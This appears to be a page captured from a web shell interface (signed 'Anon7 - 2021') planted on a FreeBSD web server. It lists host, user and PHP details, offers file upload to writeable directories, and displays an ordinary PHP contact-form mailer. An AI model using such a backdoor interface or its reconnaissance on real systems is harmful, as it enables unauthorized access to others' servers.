KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /domains/rnachum/prestige/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /domains/rnachum/prestige/mailer.php
<?php
if(isset($_POST['submit'])) {

$to = "[email protected]";
$subject = "Form Econocraft";
$name_field = $_POST['name'];
$email_field = $_POST['email'];
$phone_field = $_POST['phone'];
$company_name = $_POST['company'];
$message = $_POST['message'];
 
$body = "From: $name_field\n E-Mail: $email_field\n phone: $phone_field\n Company Name: $company_name\n Message:\n $message";
 
echo "Thank you, one of our representatives will contact you within 48 hours.<br/> <h3><a href='http://econocraft.com/prestige/'>Go Back</a></h3>";
mail($to, $subject, $body);

} else {

echo "blarg!";

}
?>

Anon7 - 2021